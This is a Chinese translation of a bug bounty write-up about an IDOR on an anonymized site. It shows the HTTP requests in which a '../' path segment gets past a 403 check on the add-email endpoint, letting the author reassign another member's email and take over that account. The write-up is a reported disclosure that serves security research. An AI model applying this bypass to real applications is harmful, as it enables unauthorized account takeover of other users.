在这篇文章中,笔者将分享如何通过简单的 IDOR 绕过导致帐户接管从赚取 2500 美元赏金。
由于我不能透露该程序的名称,因此我将根据他们的披露政策将其称为 redacted.com。
在 redacted.com 上,您可以创建一个组织并添加该组织的成员,有两种方式可在组织中添加成员。
首先第一种,您可以通过使用电子邮件地址邀请他们来添加成员。
第二种是添加一个没有电子邮件的成员,只有成员姓名,这被称为演示用户,添加演示用户后,您可以编辑它并添加电子邮件地址以使其成为实际用户。
POST /<organizationID>/addEmail/<DemoUserID>/ HTTP/2Host: redacted.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0Accept: application/jsonAccept-Language: enAccept-Encoding: gzip, deflateContent-Type: application/jsonToken: 123abcContent-Length: 40Origin: https://redacted.comReferer: https://redacted.com/{"email":"[email protected]"}
如果我将<DemoUserID>更改为我的组织内任何成员的UserID ,会发生什么情况?
尝试修改,并发包后,结果如下:403 
HTTP/2 403 ForbiddenDate: Tue, 15 Nov 2022 14:44:25 GMTContent-Type: application/jsonContent-Length: 76Pragma: no-cacheVary: OriginVary: Access-Control-Request-MethodVary: Access-Control-Request-HeadersX-Content-Type-Options: nosniff{"message":"You don't have access to this.",}
经过几个小时寻找绕过方法,我找到了一个可行的方法,最终绕过方法如下:通过../成功绕过
POST /<organizationID>/addEmail/<DemoUserID>/../<UserID>/ HTTP/2Host: redacted.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0Accept: application/jsonAccept-Language: enAccept-Encoding: gzip, deflateContent-Type: application/jsonToken: 123abcContent-Length: 40Origin: https://redacted.comReferer: https://redacted.com/{"email":"[email protected]"}
发送请求的响应为 200,成功了!
HTTP/2 200 OKDate: Tue, 15 Nov 2022 14:43:32 GMTContent-Type: application/jsonContent-Length: 2Vary: Access-Control-Request-MethodVary: Access-Control-Request-HeadersX-Content-Type-Options: nosniff{}
关联的<UserID>的电子邮件地址最终更改为攻击者所控制的电子邮件,实现了账户接管。
时间线
我在晚上10点左右发现了这个漏洞并立即提交了报告,第二天早上就收到了团队的回复。
以上内容由白帽子左一翻译并整理。原文:https://gonzxph.medium.com/account-takeover-worth-of-2500-e643661f94e9
原文始发于微信公众号(白帽子左一):通过bypass IDOR实现账户接管获得2500美元赏金
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论